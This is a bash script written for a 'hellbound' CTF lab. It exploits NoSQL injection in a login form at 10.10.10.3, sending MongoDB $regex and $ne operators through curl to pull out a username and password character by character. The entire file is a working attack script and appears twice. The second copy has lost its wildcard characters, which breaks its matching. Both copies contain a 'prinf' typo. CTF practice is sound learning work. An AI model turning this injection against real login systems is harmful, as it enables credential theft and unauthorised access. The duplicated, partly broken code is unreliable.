laztname/get-user-pass.sh

## get-user-pass.sh
#!/bin/bash
# for education purpose only.
# this is a labs.retas.io hellbound challenges.
# created just for fun.
# ambil panjang username
for len in {1..20};
do
	post="username[\$regex]=.{$len}&password[\$ne]=hax0r"
	exec=$(curl -Ls 'http://10.10.10.3/login/login.php' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.84 Safari/537.36' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8' -H 'Accept-Language: en-US,en;q=0.5' --compressed -H 'Content-Type: application/x-www-form-urlencoded' -H 'Origin: http://10.10.10.3' -H 'DNT: 1' -H 'Connection: keep-alive' -H 'Referer: http://10.10.10.3/login/' -H 'Upgrade-Insecure-Requests: 1' -H 'Pragma: no-cache' -H 'Cache-Control: no-cache' --data "$post")
	printf "check panjang username: $len\r"
	if [[ $exec == *"login salah"* ]]
	then
		len=$(expr $len - 1)
		prinf "\n\n[+] panjang user: $len\r\n"
		break
	fi
done

len=$(expr $len - 1)
# ambil username
while true; do
	for char in {a..z} {A..Z};
	do
		post="username[\$regex]=$payload$char.{$len}&password[\$ne]=hax0r"
		exec=$(curl -s 'http://10.10.10.3/login/login.php' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.84 Safari/537.36' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8' -H 'Accept-Language: en-US,en;q=0.5' --compressed -H 'Content-Type: application/x-www-form-urlencoded' -H 'Origin: http://10.10.10.3' -H 'DNT: 1' -H 'Connection: keep-alive' -H 'Referer: http://10.10.10.3/login/' -H 'Upgrade-Insecure-Requests: 1' -H 'Pragma: no-cache' -H 'Cache-Control: no-cache' --data "$post")
		printf "check user: $post\r"
		if [[ $exec != *"salah"* ]]
		then
			len=$(expr $len - 1)
			payload=$payload$char
			echo
			printf "\n\n[+] found string: $payload\r\n"
			break
		fi
	done
	if [[ $len == -1 ]]
	then
		printf "\n\n[+] username: $payload\r\n"
		break
	fi
done

username=$payload
payload=

# ambil panjang password
for len in {1..20};
do
	post="username=$username&password[\$regex]=.{$len}"
	exec=$(curl -Ls 'http://10.10.10.3/login/login.php' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.84 Safari/537.36' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8' -H 'Accept-Language: en-US,en;q=0.5' --compressed -H 'Content-Type: application/x-www-form-urlencoded' -H 'Origin: http://10.10.10.3' -H 'DNT: 1' -H 'Connection: keep-alive' -H 'Referer: http://10.10.10.3/login/' -H 'Upgrade-Insecure-Requests: 1' -H 'Pragma: no-cache' -H 'Cache-Control: no-cache' --data "$post")
	printf "$post\r"
	if [[ $exec == *"login salah"* ]]
	then
		len=$(expr $len - 1)
		printf "\n\n[+] panjang password: $len\r\n"
		break
	fi
done

len=$(expr $len - 1)
# ambil password
while true; do
	for char in {a..z} {A..Z};
	do
		post="username=adminhellbound&password[\$regex]=$payload$char.{$len}"
		exec=$(curl -s 'http://10.10.10.3/login/login.php' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.84 Safari/537.36' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8' -H 'Accept-Language: en-US,en;q=0.5' --compressed -H 'Content-Type: application/x-www-form-urlencoded' -H 'Origin: http://10.10.10.3' -H 'DNT: 1' -H 'Connection: keep-alive' -H 'Referer: http://10.10.10.3/login/' -H 'Upgrade-Insecure-Requests: 1' -H 'Pragma: no-cache' -H 'Cache-Control: no-cache' --data "$post")
		printf "check password: $post\r"
		if [[ $exec != *"salah"* ]]
		then
			len=$(expr $len - 1)
			payload=$payload$char
			printf "\n\n$payload\r"
			break
		fi

		if [[ $len == -1 ]]
		then
			echo
			printf "\n\n$payload\r\n"
			exit
		fi
	done
done
	#!/bin/bash
	# for education purpose only.
	# this is a labs.retas.io hellbound challenges.
	# created just for fun.
	# ambil panjang username
	for len in {1..20};
	do
	post="username[\$regex]=.{$len}&password[\$ne]=hax0r"
	exec=$(curl -Ls 'http://10.10.10.3/login/login.php' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.84 Safari/537.36' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8' -H 'Accept-Language: en-US,en;q=0.5' --compressed -H 'Content-Type: application/x-www-form-urlencoded' -H 'Origin: http://10.10.10.3' -H 'DNT: 1' -H 'Connection: keep-alive' -H 'Referer: http://10.10.10.3/login/' -H 'Upgrade-Insecure-Requests: 1' -H 'Pragma: no-cache' -H 'Cache-Control: no-cache' --data "$post")
	printf "check panjang username: $len\r"
	if [[ $exec == "login salah" ]]
	then
	len=$(expr $len - 1)
	prinf "\n\n[+] panjang user: $len\r\n"
	break
	fi
	done

	len=$(expr $len - 1)
	# ambil username
	while true; do
	for char in {a..z} {A..Z};
	do
	post="username[\$regex]=$payload$char.{$len}&password[\$ne]=hax0r"
	exec=$(curl -s 'http://10.10.10.3/login/login.php' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.84 Safari/537.36' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8' -H 'Accept-Language: en-US,en;q=0.5' --compressed -H 'Content-Type: application/x-www-form-urlencoded' -H 'Origin: http://10.10.10.3' -H 'DNT: 1' -H 'Connection: keep-alive' -H 'Referer: http://10.10.10.3/login/' -H 'Upgrade-Insecure-Requests: 1' -H 'Pragma: no-cache' -H 'Cache-Control: no-cache' --data "$post")
	printf "check user: $post\r"
	if [[ $exec != "salah" ]]
	then
	len=$(expr $len - 1)
	payload=$payload$char
	echo
	printf "\n\n[+] found string: $payload\r\n"
	break
	fi
	done
	if [[ $len == -1 ]]
	then
	printf "\n\n[+] username: $payload\r\n"
	break
	fi
	done

	username=$payload
	payload=

	# ambil panjang password
	for len in {1..20};
	do
	post="username=$username&password[\$regex]=.{$len}"
	exec=$(curl -Ls 'http://10.10.10.3/login/login.php' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.84 Safari/537.36' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8' -H 'Accept-Language: en-US,en;q=0.5' --compressed -H 'Content-Type: application/x-www-form-urlencoded' -H 'Origin: http://10.10.10.3' -H 'DNT: 1' -H 'Connection: keep-alive' -H 'Referer: http://10.10.10.3/login/' -H 'Upgrade-Insecure-Requests: 1' -H 'Pragma: no-cache' -H 'Cache-Control: no-cache' --data "$post")
	printf "$post\r"
	if [[ $exec == "login salah" ]]
	then
	len=$(expr $len - 1)
	printf "\n\n[+] panjang password: $len\r\n"
	break
	fi
	done

	len=$(expr $len - 1)
	# ambil password
	while true; do
	for char in {a..z} {A..Z};
	do
	post="username=adminhellbound&password[\$regex]=$payload$char.{$len}"
	exec=$(curl -s 'http://10.10.10.3/login/login.php' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.84 Safari/537.36' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8' -H 'Accept-Language: en-US,en;q=0.5' --compressed -H 'Content-Type: application/x-www-form-urlencoded' -H 'Origin: http://10.10.10.3' -H 'DNT: 1' -H 'Connection: keep-alive' -H 'Referer: http://10.10.10.3/login/' -H 'Upgrade-Insecure-Requests: 1' -H 'Pragma: no-cache' -H 'Cache-Control: no-cache' --data "$post")
	printf "check password: $post\r"
	if [[ $exec != "salah" ]]
	then
	len=$(expr $len - 1)
	payload=$payload$char
	printf "\n\n$payload\r"
	break
	fi

	if [[ $len == -1 ]]
	then
	echo
	printf "\n\n$payload\r\n"
	exit
	fi
	done
	done